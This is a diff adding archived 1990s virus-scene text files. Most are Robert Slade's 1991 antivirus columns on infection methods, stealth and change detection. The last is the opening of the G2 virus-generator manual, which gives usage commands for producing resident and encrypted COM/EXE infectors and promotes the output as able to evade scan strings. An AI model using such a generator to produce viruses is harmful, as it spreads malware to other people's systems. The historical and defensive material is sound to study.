+bear in mind the times that the virus is actively "infectious". 
+The viral activation is not the same as the activation of the
+payload that a virus may carry.  For example, the payload of the
+original "Stoned" virus was a message which appeared on the
+screen saying "Your PC is now Stoned!".  This message only
+appears at boot time, and on only one eighth of the times the
+computer is rebooted.  The virus, however, is infectious at all
+times, if it has infected the hard disk.
+
+There are basically three possibilities for the infectious
+period: now ("one-shot"), during program run ("while called") or
+from now on (resident).  These periods may be modified by other
+circumstances.  A resident virus may remain in memory, but only
+be actively infecting when a disk is accessed.  A "while called"
+virus may only infect a new program when a directory is changed.
+
+"One-shot" viri only get one chance on each "run" of the infected
+program.  The viral code will seek out and infect a target
+program.  They then pass control to the original program, and
+perform no further functions.  These are, of course, the simplest
+of the viral programs.  Mainframe "mail" viri are generally of
+this type.
+
+The second class will activate when the infected program is
+called, and then pass partial control to the original program. 
+The virus, however, will remain operational during the time that
+the infected program is running.  If this can be accomplished, it
+is only a slight jump to write a fully memory resident virus.
+
+Resident viri are the most successful, and the most dangerous, of
+viral programs.  A resident virus will become active when an
+infected program is run (or at boot time for boot sector
+infectors), and remain active until the computer is rebooted or
+turned off.  (Some viral programs are even able to trap the
+rebooting sequence that is normally called when you press Ctrl-
+Alt-Del on an MS-DOS PC, and thus are able to survive a "warm
+boot.")  The most successful of the file infectors, the Jerusalem
+virus, is resident, as are all boot sector infectors.  (For
+fairly obvious reasons; the boot sector is never "called" in
+normal operation.)
+
+If a virus is active in memory, it is a waste of time trying to
+disinfect a file or disk.  No sooner is the file "cleaned", than
+it becomes a suitable target for re-infection.  You may try to
+disinfect a hard disk right down to performing a low level
+format: as soon as the disk is reformatted it may be infected all
+over again.  This is why all directions for disinfection stress
+the necessity of "cold" booting from a disk that is known to be
+free of infection before attempting any cleanup.
+
+copyright Robert M. Slade, 1991   FUNGEN5.CVP   910828 
\ No newline at end of file
diff --git a/textfiles.com/virus/fungen6.cvp b/textfiles.com/virus/fungen6.cvp
new file mode 100644
index 00000000..b516ead4
--- /dev/null
+++ b/textfiles.com/virus/fungen6.cvp
@@ -0,0 +1,57 @@
+FUNGEN6.CVP   911101
+
+                       Change detection
+
+A virus has to change *something*.
+
+This fact is absolutely fundamental to the operation of computer
+viral programs, and therefore, in a sense, provides a guaranteed
+form of virus prevention or detection.  If we make a machine
+that cannot change anything (and the disadvantages of this have
+been thoroughly discussed) we can prevent infection.  If any
+change made can be detected, then any infection can be detected,
+although discriminating between an infection and a valid change
+remains problematic.
+
+It is interesting to note that the early antiviral programs, at
+least the most widely used ones, relied first upon activity
+monitoring and then signature scanning.  Nowadays almost all
+antiviral programs implement some version of automated change
+detection.  The detection of the first viri, and the ongoing
+research into new strains, relies almost entirely on "manual"
+methods of change detection.
+
+This method of detection is available to anyone who has a
+computer and the most basic tools of the operating system.  It
+is, of course, made somewhat easier with the more advanced
+"utility" programs available on the market, but the best defence
+remains a thorough knowledge of your computer, and what it is
+supposed to be doing.
+
+A knowledge of what programs are on the computer, and a list of
+file sizes and creation dates is a simple piece of protection
+requiring no special programs whatsoever.  This one simple tool,
+however, can provide detection of most file infecting viri.  It
+will even detect "stealth" viri if the computer is booted from a
+clean system disk before the check is made.
+
+DEBUG is provided with every copy of MS-DOS, and can be used to
+view, and make a copy of, the boot record of every disk. 
+(Partition boot records of hard disks are beyond the reach of
+DEBUG, but within the reach of F-PBR, from 1.xx versions of
+FPROT.)
+
+Memory maps (and hex dumps of boot sectors) are not easy to
+read, even for experienced, but non-programming, users. 
+However, it is not necessary that the user understand all the
+entries in a boot sector or memory map.  It is only necessary
+that the user have a printout of a run of, say, MEM/C in an
+initially clean state, and then be able to spot a difference in
+a subsequent run of the program.
+
+In reality, of course, most users will not take the time and
+trouble to check for changes in the system.  Most users want a
+program which will do it for them, and preferably one which will
+do the checking automatically, and alert them to anything wrong.
+
+copyright Robert M. Slade, 1991   FUNGEN6.CVP   911101 
\ No newline at end of file
diff --git a/textfiles.com/virus/fungen7.cvp b/textfiles.com/virus/fungen7.cvp
new file mode 100644
index 00000000..bb55054b
--- /dev/null
+++ b/textfiles.com/virus/fungen7.cvp
@@ -0,0 +1,56 @@
+FUNGEN7.CVP   911113
+
+                         File checking
+
+Most file infecting viral programs can be checked for quite
+simply, and without any special programs or equipment. 
+Provided, that is, that the computer user will pay the most
+minimal attention to the system, and take the most basic
+precautions.
+
+The simplest form of antivirus detection "equipment" is a list
+of all the programs to be run on the computer, with the size and
+"last changed date" for each.  (The list for "resource" based
+systems such as the Macintosh will, of necessity, be somewhat
+larger, and must include all "code" resources on the disk.) 
+With some few (albeit important) exceptions, programs should
+never change their size or file date.  Any changes that are
+made, should be at the request of the user, and thus easy enough
+to spot as exceptions.
+
+While "stealth" technology of various types has been applied to
+viral programs, the most common (and successful) viri, to the
+date of this writing, have not used it.  Most change the size of
+the file, and generally do it in such a standardized fashion
+that the "infective length" of the virus is often used as an
+identification of the specific viral program.  The file date is
+changed less often, but is sometimes deliberately "used" by the
+virus as an indicator to prevent reinfection.  (One used the
+value of "31" in the seconds field, which is presumably why the
+later 1.xx versions of F-PROT all had dates ending in 31. 
+Another used the "impossible" value of 62.)
+
+Even when stealth techniques are used, they generally require
+that the virus itself be running for the measures to be
+effective.  We thus come to the second piece of antiviral
+equipment; the often cited "known clean boot disk".  This is a
+bootable system (floppy) disk, created under "sterile"
+conditions and known to be free of any viral program infection,
+and write protected so as to be free from possible future
+contamination.  When the computer is "booted" from this disk,
+the hard disk boot sector and system areas can be bypassed so as
+to prevent "stealth" programs from passing "false data" about
+the state of the system.
+
+Viral protection can thus start with these simple, and
+non-technical provisions.  Starting with a known-clean system,
+the list can be checked regularly for any discrepancies.  The
+"clean disk" can be used to "cold boot" the system before these
+checks for added security.  Checks should be performed before
+and after any changes made to software, such as upgrades or new
+programs.
+
+Security does not, of course, end here.  This is only a very
+simple first line of defence.
+
+copyright Robert M. Slade, 1991   FUNGEN7.CVP   911113 
\ No newline at end of file
diff --git a/textfiles.com/virus/fungen8.cvp b/textfiles.com/virus/fungen8.cvp
new file mode 100644
index 00000000..3084321c
--- /dev/null
+++ b/textfiles.com/virus/fungen8.cvp
@@ -0,0 +1,58 @@
+FUNGEN8.CVP   911115
+
+                    File checking - part 2
+
+Historically, it is interesting to note that, initially,
+operation monitoring and restricting software was the preferred
+means of antiviral protection.  Subsequently signature scanning
+software became more prevalent, and currently holds dominance in
+terms of number of programs in use.  Change detection software,
+however, has recently become very popular and, from my reviews
+of software, at least, now leads in terms of number of different
+programs implementing the technique.
+
+The most basic type of change detection program could simply
+automate the process of manual file checking outlined in the
+previous column.  However, this would not catch "overwriting"
+viri, as long as they did not change the file date.  Therefore,
+most change detection software performs some type of "image
+checking" as well.
+
+"Image", "numerical" or "statistical" file checking is based on
+calculations performed on the data making up the file.  At its
+most rudimentary, this is based on the "checksum".  As the name
+suggests, this is nothing more than a check of the "summing" of
+all data in the file, or sometimes the modulus of that sum. 
+More complex is the CRC or "cyclic redundancy check", which
+performs more complex calculations on matrices of the data. 
+(This is done in a fashion similar to the Hamming encoding used
+for error detection and correction.)
+
+It would be fairly simple for an overwriting virus to calculate
+the checksum for a given file, and then to modify the code of
+the infected file in such a way that the checksum would still
+match.  This is the reason for some of the more complex
+calculations which are implemented.
+
+While the initial checking of files is fairly standard, there
+are a wide variety of implementations for the subsequent
+checking of files.  The original information must, of course, be
+stored somewhere.  Some programs create a single file for this,
+others attach the information to the program to be protected. 
+Each means has advantages and disadvantages.  A single file
+means a single entity which virus authors may find out about and
+"target".  Attaching of data to programs which may be altered
+means that the calculated codes may be altered or erased as
+well.  Sometimes small modules of code are attached to the
+programs in order to allow the programs to check themselves. 
+Unfortunately, adding such modules to programs which already
+check themselves for changes may prevent the programs from
+running.  (Norton AntiVirus stores the information in a number
+of hidden, 77 byte files, with names similar to that of the
+protected file.  This caused a number of users to suspect that
+the results of Norton's protection were actually the results of
+a virus.  One fairly unique ploy is used by "Victor Charlie",
+which, in its earliest incarnation, simply offered itself as
+"bait" to viral programs -- and then checked itself.)
+
+copyright Robert M. Slade, 1991   FUNGEN8.CVP   911115 
\ No newline at end of file
diff --git a/textfiles.com/virus/fungen9.cvp b/textfiles.com/virus/fungen9.cvp
new file mode 100644
index 00000000..6d6a808a
--- /dev/null
+++ b/textfiles.com/virus/fungen9.cvp
@@ -0,0 +1,52 @@
+FUNGEN9.CVP   911127
+
+                        System checking
+
+The measures described in the previous two columns will detect
+file infecting viral programs (within limits.)  However, a very
+large class, or perhaps a number of sub-classes, of viral
+programs do not make any changes to program files on the disk.
+
+Boot sector infectors replace or move the "boot program"
+resident on almost every disk.  Although these viri are
+extremely common, surprisingly few "change detectors" bother to
+make any check of this area at all.  One reason may be that a
+number of computers make regular changes to the boot sector for
+various purposes.
+
+"Companion" viri, while they are associated with certain
+programs, do not make any changes to existing program files at
+all.  Similar claims can be made for "system" viri, such as the
+DIR-II virus, which leaves the file intact, but changes the
+directory entry in order that the virus, which "officially" does
+not exist on the disk, gets called first.
+
+It is, therefore, necessary to check much more than the size and
+image of the individual program files on the disk in order to
+detect viral infections.  The boot sector (and master/partition
+boot record) should be checked, although it is possible that a
+certain area should be excluded from checking in the case of
+certain computers.  A check on the total number of programs, and
+names, should also be kept separate from the system directory. 
+A copy of the directory and file allocation table should also be
+kept, especially in regard to program files.
+
+System memory, and the allocation of system interrupts, should
+also be checked.  This is problematic during normal operations,
+as programs tend to use, and sometimes not fully release, areas
+of memory and interrupts as they work.  Therefore, the best time
+to do such checking is at boot time, even before drivers and
+programs have loaded from the startup files.  (DISKSECURE does
+this to great effect.  So did F-PROT's F-DRIVER.SYS -- which led
+to unfortunate conflicts with MS-DOS 5.0.  The security
+programmer's lot is not an easy one, with virus writers,
+legitimate programs and even operating systems continually
+finding new and "interesting" ways to do things.)  It is also
+possible, however, and quite desirable, to take a "snapshot" of
+memory immediately after the startup sequence.  This should be
+able to detect any changes made to programs involved in the boot
+sequence, as well as other changes.  (It may also "catch"
+program traps which "redirect" a "warm" boot in order to avoid
+disk security devices.)
+
+copyright Robert M. Slade, 1991   FUNGEN9.CVP   911127 
\ No newline at end of file
diff --git a/textfiles.com/virus/fungena.cvp b/textfiles.com/virus/fungena.cvp
new file mode 100644
index 00000000..f2f03d47
--- /dev/null
+++ b/textfiles.com/virus/fungena.cvp
@@ -0,0 +1,56 @@
+FUNGENA.CVP   911202
+
+                      Detection avoidance
+
+Viral programs have almost no defence at all against
+disinfection.  99% of viri are almost trivially simple to get
+rid of, simply by replacing the "infected" file (or boot sector)
+with an original copy.  (Some more recent boot sector and system
+viri require slightly more knowledge in order to perform
+effective disinfection: none require drastic measures.)  Far
+from their image as the predators of the computer world, viral
+programs behave much more like prey.  Their survival is
+dependant upon two primary factors: reproductive ability and
+avoidance of detection.
+
+Using the standard system calls to modify a file leaves very
+definite traces.  The change in a file "creation" or "last
+modified" date is probably more noticeable than a growth in file
+size.  File size is rather meaningless, whereas dates and times
+do have significance for users.  Changing the date back to its
+original value, however, is not a significant programming
+challenge.
+
+Adding code while avoiding a change in file size is more
+difficult, but not impossible.  Overwriting existing code and
+adding code to "unused" portions of the file or disk are some
+possible means.  (The fictional rogue program P1, in Thomas
+Ryan's "The Adolesence of P1", avoided problems of detection by
+analyzing and rewriting existing code in such a manner that the
+programs were more compact and ran more efficiently.  Such
+activity has not yet, alas, been discovered in any existing
+virus.)
+
+Some viral programs, or rather, virus authors, rely on
+psychological factors.  There are a number of examples of viri
+which will not infect program files under a certain minimum
+size, knowing that an additional 2K is much more noticeable on a
+5K utility than on a 300K spreadsheet.
+
+In a sense these are all "stealth" technologies, but this term
+is most often used for programs which attempt to avoid detection
+by trapping calls to read the disk and "lying" to the
+interrogating program.  By so doing, they avoid any kind of
+detection which relies upon perusal of the disk.  The disk gives
+back only that information regarding file dates, sizes and
+makeup which were appropriate to the original situation.  (This
+also relies upon the virus being "active" at the time of
+checking.)  Although this method avoids any kind of "disk"
+detection, including checksumming and signature scanning, it
+leaves traces in the computer's memory which can be detected. 
+(Some viral programs also try to "cover their tracks" by
+watching for any analysis of the area they occupy in memory and
+crashing the system, but this tends to be noticeable behaviour
+... )
+
+copyright Robert M. Slade, 1991   FUNGENA.CVP   911202 
\ No newline at end of file
diff --git a/textfiles.com/virus/funpiv1.cvp b/textfiles.com/virus/funpiv1.cvp
new file mode 100644
index 00000000..7e48569e
--- /dev/null
+++ b/textfiles.com/virus/funpiv1.cvp
@@ -0,0 +1,47 @@
+FUNPIV1.CVP   911006
+
+                       File infecting viri
+
+File, or program, infecting viral programs, while possibly not as
+numerous as boot sector infectors in terms of actual infections,
+represent the greatest number of known viral strains, at least in
+the MS-DOS world.  This may be due to the fact that file infectors
+are not as constrained in size as BSIs, or that file infectors do
+not require the detailed knowledge of system "internals" which may
+be necessary for effective boot sector viri.
+
+File infecting viri spread by adding code to existing executable
+files.  They have the potential to become active when an infected
+program is run.  Whereas boot sector infectors must be memory
+resident in order to spread, file infecting programs have more
+options in terms of infection.  This means that there is greater
+range in the scope for writing file infecting viri, but it also
+means that there may be fewer opportunities for a given virus to
+reproduce itself.
+
+File infecting viral programs must, of necessity, make some kind of
+change in the target file.  If normal DOS calls are used to write
+to it the file creation date will be changed.  If code is added to
+it, the file size will change.  Even if areas of the file are
+overwritten in such a way that the file length remains unchanged,
+a parity, checksum, cyclic redundancy or Hamming code check should
+be able to detect the fact that there has been some change.  The
+Lehigh and Jerusalem viri, the first to become widely known to the
+research community on the Internet, were both initially identified
+by changes they made to target files (the Jerusalem being widely
+known by its length as "1813".)  "Change detection", therefore,
+remains one of the most popular means of virus detection on the
+part of antiviral software producers.
+
+Because change detection is a means of virus detection that
+requires no sophisticated programming (in some cases, no
+programming at all), virus writers have attempted to camouflage
+changes where they can.  It is not a difficult task to avoid making
+changes to the file creation date, or to return the date to its
+original value.  It is possible to "overlay" the original code of
+the program, so that the file is not increased in size.  Most
+recently, virus authors have been using "stealth" programming: a
+means of "shortcutting" the operating system, and returning only
+the original, unchanged, values at any request for information.
+
+copyright Robert M. Slade, 1991   FUNPIV1.CVP   911006 
\ No newline at end of file
diff --git a/textfiles.com/virus/funpiv2.cvp b/textfiles.com/virus/funpiv2.cvp
new file mode 100644
index 00000000..e7e2cd4c
--- /dev/null
+++ b/textfiles.com/virus/funpiv2.cvp
@@ -0,0 +1,48 @@
+FUNPIV2.CVP   911006
+
+                      Viral code insertion
+
+There are four ways to attach code to an existing program:
+overwrite existing program code, add code to the beginning of the
+program, add code to the end of the program and not add code to the
+existing program.
+
+Overwriting viral programs are a very simplistic answer to the
+problem of how to add code to an existing program without changing
+the file size.  By simply overlaying code which is already on the
+disk, the original size remains unchanged.  There are a few
+problems with this approach.
+
+The first is the problem of how to get the virus "called" when the
+infected program is run.  If the code is just inserted anywhere, it
+may not be in a part of the program that gets used every time the
+program is run.  (Every programmer is aware of the Pareto
+Principle's application here: 20 percent of the code does 80
+percent of the work.  Some code never gets called at all.)  It is
+possible, by an analysis of the code of the target program, to find
+an "entry point" which is used extensively.  It is also possible,
+and a lot easier, to place a jump at the beginning of the program
+which points to the viral code.
+
+The second problem is much more difficult to deal with.  If the
+virus code overwrites existing portions of the program code, how do
+you know the loss of that program code is not fatal to the target
+program?  Analysis of this type, on the original code, would be
+very difficult indeed.  "Successful" overwriting viri tend to be
+short, and to look for extensive strings of NUL characters to
+replace.  (The NUL characters tend to be used to "reserve" stack
+space, and thus are not vital to the program.)  Even if the
+original code is not vital to the program, it may, if replaced,
+cause the program to exhibit strange behaviours, and thus lead to
+detection of the viral infection.
+
+Thus, while overwriting viri solve the problem of file size, they
+bring with them some inherent problems which appear, at this time,
+to severely limit their effectiveness "in the wild".  To this date,
+while many overwriting viri have been written, none have enjoyed
+great "success", or become a widespread and major problem.
+
+(The Zen-like nature of the opening paragraph will be explained in
+future columns.)
+
+copyright Robert M. Slade, 1991   FUNPIV2.CVP   911006 
\ No newline at end of file
diff --git a/textfiles.com/virus/funpiv3.cvp b/textfiles.com/virus/funpiv3.cvp
new file mode 100644
index 00000000..dc578493
--- /dev/null
+++ b/textfiles.com/virus/funpiv3.cvp
@@ -0,0 +1,51 @@
+FUNPIV3.CVP   911013
+
+                      Viral code addition
+
+In order to avoid damage to the original program, which might
+lead to detection of the infection, the viral code can be added
+to the beginning or end of the program.  (Or not attached at
+all.)
+
+Adding code at the beginning of the original program ensures
+that the viral code is run whenever the program is run.  (This
+also ensures that the virus is run before the program runs.  The
+virus thus has priority in terms of operation, possible
+conflicts and detection.)  With the addition of code to the
+beginning of the program, it is possible to avoid any change to
+the original code.  It *is* necessary to alter the file/disk
+allocation table, at least, in order to ensure that the program
+"call" starts with the viral code, and that the viral code is
+not overwritten by other changes to the disk or files.  While
+the original code may be left unchanged, the file will be,
+essentially, altered, and, unless techniques are used to
+disguise this, will show a different creation date, size and
+image.
+
+It is also, however, possible to add viral code to the end of
+the original program, and still ensure that the viral code is
+run before that of the original program.  All that is necessary
+is to alter the file header information to reflect the fact that
+you want to start executing the file towards the end, rather
+than at the normal location.  At the end of the viral code
+another jump returns operation to the original program.
+
+(This kind of operation is not as odd as it may sound.  It is
+not even uncommon.  A legacy from the days of mainframe "paging"
+of memory, it is used in a great many MS-DOS executables, either
+in single .EXE files or in overlays.  It is, therefore, not a
+coding indication that can be used to identify viral type
+programs or infected files.)
+
+Appending, or prepending, viral code to an existing program
+therefore avoids the problems of damage and potential failure to
+run which plague overwriting viral programs.  Even these viral
+programs, however, are not foolproof.  Programs which load in
+very non-standard ways, such as KEA's "Zstem" terminal emulation
+program, use the header information which the viral programs
+alter.  Although not originally designed for virus detection,
+the "Program abort - invalid file header" message thus generated
+is an indication of viral infection.  Sometimes the first
+indication that users have.
+
+copyright Robert M. Slade, 1991   FUNPIV3.CVP   911014 
\ No newline at end of file
diff --git a/textfiles.com/virus/funpiv4.cvp b/textfiles.com/virus/funpiv4.cvp
new file mode 100644
index 00000000..b5803908
--- /dev/null
+++ b/textfiles.com/virus/funpiv4.cvp
@@ -0,0 +1,57 @@
+FUNPIV4.CVP   911020
+
+                   Viral code "association"
+
+The simplest way for a viral program to avoid the detection that
+results from modifying the code of an existing program is not to
+modify the original program.  This is an elementary solution,
+but would seem to have the drawback that, unless you do change
+the file in some way, the virus will never be called.
+
+There is a "solution" to this problem, and (if I may be allowed
+some enthusiasm for the concept, if not the reprehensible act) a
+rather elegant one at that.
+
+In a given situation, computers may be presented with a number
+of possible courses of action.  The action taken first is
+decided by pre-programmed precedence.  A number of programs may
+have very similar names, leading to potential confusion about
+which one is to be run in a given invocation.  In the case of
+MS-DOS, for example, SET.COM, SET.EXE and SET.BAT are all
+"executable" files.  In the normal course of events, any one
+could be invoked by giving the command "SET".  If all three
+files exist, which one is to be run?
+
+The precedence of program invocation under MS-DOS is that .COM
+files are first, .EXE second and .BAT last.  If three files of
+the same name do exist, this does not imply that all three will
+be run in that sequence, but rather that giving the command
+"SET" will always invoke only the SET.COM file.
+
+A certain class of viral programs; known variously as
+"companion", "spawning" or "precedence" viri; use this feature
+of the operating system.  They "infect" a file with an .EXE
+extension simply by creating another file with the same name,
+but a .COM extension.  Thus the .COM file is always executed in
+place of the original .EXE file.  The original file remains
+unchanged, and no manner of "change detection" will tell you any
+different.  (In order to further avoid detection the viral file
+will generally end with a very specific "call" to the original
+program, and the viral program has the "hidden" attribute set. 
+In the Macintosh and other GUI operating systems, it is possible
+for a virus to take precendence by "overlaying" an existing icon
+with another which is either transparent or identical to the
+first.)
+
+Fortunately, companion viri are by no means perfect.  For one
+thing, they are limited to those programs which are "lower" in
+the order of precedence.  For another, the "hidden" attribute is
+relatively easy to overcome (particularly in MS-DOS), and an
+alphabetical listing of files will quickly turn up the anomaly
+of identical names.  Of the antiviral packages tested so far, no
+change detector alerts to duplicate names, although many may
+alert the user by asking the user to "validate" a file that has
+been in use for some time.  It will probably not be long,
+however, before this is a common feature.
+
+copyright Robert M. Slade, 1991   FUNPIV4.CVP   911020 
\ No newline at end of file
diff --git a/textfiles.com/virus/funpiv5.cvp b/textfiles.com/virus/funpiv5.cvp
new file mode 100644
index 00000000..9c260096
--- /dev/null
+++ b/textfiles.com/virus/funpiv5.cvp
@@ -0,0 +1,56 @@
+FUNPIV5.CVP   911030
+   
+                     Infection variations
+   
+This months columns have dealt with a number of possible ways
+that computer viral programs may infect program files. 
+Unfortunately the overwriters, prependers, appenders and
+companions mentioned do not exhaust the possibilities.
+   
+(By the way, this week's column is basically courtesy of
+Vesselin Bontchev, who did all the research.)
+   
+In discussing overwriting viri I mentioned, by concept although
+not by name, the Zerohunt virus, which looks for a string of nul
+characters of sufficient length to accommodate it.  However,
+there is also the Nina virus, which overwrites the beginning of
+a file, and the Phoenix family, which overwrites a random
+section of a file, both of which append the overwritten part to
+the end.  The Number of the Beast/512 virus and 1963 both
+overwrite the beginning of the file and then move the contents
+of the overwritten section beyond the *physical* end of the file
+into a portion of the last cluster the file occupies.  Because
+the clusters are always of a fixed size, and because it is very
+unusual for a file to exactly match a "multiple of cluster"
+size, there is generally some space there which is, essentially,
+invisible to the operating system.
+   
+In the world of prependers, a similar consideration is used by
+the Rat virus.  EXE file headers are always a multiple of 512
+bytes, so there is often an unused block of space in the header
+itself, which the Rat assumes.  The Suriv 2.01 works a bit
+harder: it moves the body of the file and inserts itself between
+the header and original file, and then changes the relocation
+information in the header.
+   
+Then there is the DIR II.  The viral code is written to one
+section of the disk ... and then the directory and file
+allocation information is altered in such a way that all
+programs seem to start in that one section of the disk.  Because
+of the convoluted way this virus works, it is possible to "lose"
+all the programs on the disk by attempting to "repair" them.
+   
+At this point in my seminar, there is an overhead foil marked
+"This page intentionally left blank."  The point being that
+there are all kinds of subtle variations on the themes covered
+here ... and quite a few not so subtle means which will only
+become obvious after they have been used.  However, it is
+important to note that the most "successful" viri in terms of
+numbers of infections are not necessarily the "new models", but
+the older and often less sophisticated versions.  On the one
+hand, this indicates that novelty is not a "viral survival
+factor."  On the other hand, it points out, in rather depressing
+manner, that most computer users are still not using even the
+most basic forms of antiviral protection.
+   
+copyright Robert M. Slade, 1991   FUNPIV5.CVP   911030 
\ No newline at end of file
diff --git a/textfiles.com/virus/g2.txt b/textfiles.com/virus/g2.txt
new file mode 100644
index 00000000..b80c4ef3
--- /dev/null
+++ b/textfiles.com/virus/g2.txt
@@ -0,0 +1,564 @@
+                                       
+                                       
+                                       
+  
+                           Phalcon/Skism's G� 0.70�
+                    The Second Generation in Virus Creation
+                             Written by Dark Angel
+                                January 1, 1993
+                                       
+                  "Where do we think up these cheesy names?"
+                                                 -Dark Angel
+                                       
+  TABLE OF CONTENTS
+  TITLE PAGE                                                 i
+  TABLE OF CONTENTS                                          i
+  DISCLAIMER                                                 i
+  PURPOSE                                                   ii
+  FEATURES                                                  ii
+  RESTRICTIONS                                             iii
+  RUNNING G� (HOW DO I GET THE DAMN THING TO WORK?)          1
+  G� HAS THE POWER                                           1
+  STILL NO IDE                                               1
+  MODIFICATION OF GENERATED FILES                            2
+  UPGRADES                                                   2
+  ADDITIONAL G� FILES                                        3
+  PROBLEMS AND FUTURE IMPROVEMENTS                           3
+  CONCLUSION                                                 4
+  HISTORY OF VIRUS TOOLKITS                                  A
+  
+  
+  
+  
+  
+  
+  
+  DISCLAIMER
+  
+       G� is hereby released into the Public Domain, and may not be sold or
+  marketed in any form without the permission and written consent from the
+  author.  The author retains all copyrights to this program, in either the
+  original or modified forms, and no violation, deletion, or change of either
+  the copyright notice or this disclaimer is allowed.
+  
+       G� and the source code generated by said program are not to be used in
+  any malicious  or otherwise  irresponsible  manner.    The  author  is  not
+  responsible for  any  damages,  incidental  or  otherwise,  resulting  from
+  running either  the core  program or  any programs  generated by  it.   The
+  program itself is not designed to be damaging and responsibility for proper
+  usage and  containment of  any code created by the program (either modified
+  or unmodified)  is entirely  placed on the user of G�.  All source code and
+  executable files  generated either entirely or partially with G� may not be
+  distributed  without  the  recipient's  full  knowledge  of  the  contents.
+  Malicious use of this code is malicious.
+  
+       G� is  guaranteed to  exist for  five years or 50,000 miles, whichever
+  comes first.
+  
+  
+  
+                                                                     i
+
+  PURPOSE
+  
+       G� is  NOT a  modification of  the  Phalcon/Skism  Mass-Produced  Code
+  generator; it  is a complete rewrite and functions in a radically different
+  manner.   There will  be no  further releases of the PS-MPC, as the project
+  represented the amoeba-stage of virus creation.
+  
+       G�, Phalcon/Skism's  newest virus  creation tool, is designed to allow
+  everyone easy  access to  computer virus  source code.   More than a simple
+  Vienna hack  generator, it  creates viruses  "on-the-fly" as  per the  user
+  specifications.   G� is  designed to  be easily maintainable and extensible
+  through the  use of  special data  files created  especially for use by the
+  program.
+  
+       G� arrives  after the  Virus Construction  Lab and  the  Phalcon/Skism
+  Mass-Produced Code  generator.   These two  excellent code  generators have
+  several shortcomings inherent in their design.  First, they only create one
+  specific virus  given a specific configuration.  Their design allows for no
+  variability in code generation.  Second, upgrading the generated code means
+  getting a  new COM  or EXE file.  With the overhead of the IDE code in VCL,
+  this  means  redownloading  over  100K  each  release,  most  of  which  is
+  redundant.   Although the  PS-MPC is  much  smaller  and  certainly  better
+  written, it  still suffers  from the  same lack  of simple  upgrades.   The
+  problem arises  because the data needed by the programs for code generation
+  are hard coded, and not in easily updated external files.
+  
+       G�, of  course, has none of the problems associated with earlier virus
+  generators.   Designed with configurability, variability, and upgradability
+  in mind, G� represents the current apex of virus generation.
+  
+  FEATURES
+  
+       The  target   audience  of   G�  includes  both  novice  and  advanced
+  programmers alike  who wish  to learn  more about  virus  programming.    A
+  revolutionary tool  in virus  generation,  G�  is  both  easy  to  use  and
+  unparalleled in  performance.   As a  code generator,  it has  a number  of
+  features including:
+  
+    o Easy updates via data files.
+    o Accepts MPC-compliant configuration files.
+    o Different viruses may be generated from identical configuration files.
+    o Small executable size, allowing for speed during load and execution.
+    o Still  no IDE - edit the configuration file in your favorite editor and
+      rapidly generate  new code;  no need  for lengthy wait while IDE loads,
+      allowing you  to work  faster and  have results  quicker.   A  definite
+      productivity bonus!
+    o Rapid generation of code, once again allowing for fast results.
+    o Low memory requirements.
+  
+  As a virus creation tool, it has the following features:
+  
+    o Generates compact, easily modified, fully commented, source code.
+    o COM/EXE infectors.
+    o Resident and nonresident viruses.
+    o  Supports   multiple,  semi-polymorphic   encryption   routines   (full
+      polymorphism coming soon).
+    o Easily upgraded when improvements are needed.
+  
+       Clearly, G� is the most advanced virus code generator available today.
+  
+  
+                                                                     ii
+
+  RESTRICTIONS
+  
+       Everyone is free to use this program at no charge except for ex-Senior
+  Engineers of  Data Plus,  who must  pay off  the American  national debt in
+  order to  use this program or view the documentation beyond this page (only
+  one or  the other).   Payment  of the  American national debt and a sum not
+  less than  said debt  to the  creator of  this program is necessary for the
+  privilege of both using the program AND viewing the documentation.  Failure
+  to do so will result in a still penalty.
+  
+       This program and this document are copyrighted materials of Dark Angel
+  of Phalcon/Skism.   No  one may  duplicate the  document in  printed  form,
+  either in  part or  in full,  without an  appropriate citation.   Ex-Senior
+  Engineers of  Data Plus  are not allowed to duplicate either the program or
+  the document in any case.
+  
+  IF YOU  ARE A  SENIOR ENGINEER,  STOP READING NOW.  IF YOU ARE OR KNOW OF A
+  SENIOR ENGINEER  WHO HAS  VIOLATED THE  RESTRICTIONS, THEN IT IS YOUR MORAL
+  AND CIVIC  DUTY TO  CALL THE  SPA, ASP, PSA, PAS, OR ANY OTHER ORGANIZATION
+  WITH SOME  COMBINATION OF  THOSE LETTERS TO REPORT THE VIOLATOR AND TO MAKE
+  SURE HE OR SHE IS PUNISHED TO THE FULLEST EXTENT UNDER THE LAW.
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+                                                                     iii
+
+  RUNNING G� (HOW DO I GET THE DAMN THING TO WORK?)
+  
+       Make sure  that the G2.DAT file is in the current directory.  Edit the
+  configuration file  to set  the desired parameters.  Then use the following
+  simple command to generate the assembly code:
+  
+            G2 [<datafile>] <configfile1> [[<configfile2>] ...]
+  
+       Datafile is  an optional  parameter which  allows G� to use other data
+  modules in  lieu of the default (G2.DAT).  Configfile refers to the name of
+  the configuration  file which  G� uses  to determine the characteristics of
+  the generated  virus.   The sample configuration file, G2.CFG, contains all
+  the information  you need  to generate  your own  virus.   There can be any
+  number of configuration files following the first parameter.  Once invoked,
+  G� will dutifully create the source code files.  To assemble, simply follow
+  the instructions  found in  the source  code files.   The  source  code  is
+  written for Turbo Assembler and will not work with other assemblers without
+  modification.
+  
+  EXAMPLE:
+       Let's say  you have created a configuration file called FOOBAR.CFG and
+  wish to generate a virus from it.  Simply type:
+       G2 FOOBAR.CFG
+  and the deed is done.  It doesn't get much simpler than this.
+  
+  EXAMPLE:
+       Let's say  you wish  to create viruses from the data file BLIP.DAT and
+  the configuration files BLOP.CFG and BLUP.CFG.  At the DOS prompt, type:
+       G2 BLIP.DAT BLOP.CFG BLUP.CFG
+  Two files will then be created.
+  
+  G� HAS THE POWER
+  
+       The key  to G�'s  power lies  in its  flexibility in  code generation.
+  Source code  files created  by G� from identical configuration files almost
+  always differ in both size but not in functionality.  G�'s data files allow
+  for multiple code segments for each given routine.  Additionally, the lines
+  of assembly  within each  routine  may  be  placed  in  different  relative
+  positions by  G�.  Consequently, few code segments are stable and it should
+  therefore be  tough to find a generic scan string for G�-generated viruses.
+  Finally, since  G� operates  with  easily-upgraded  data  files,  any  such
+  generic scan string is guaranteed to have a very short life, i.e. until the
+  next release  of the  data file.  As more routines are added, the number of
+  possible viruses  will grow  exponentially, thereby  making a  generic scan
+  string approach unwieldy, if not impossible.
+  
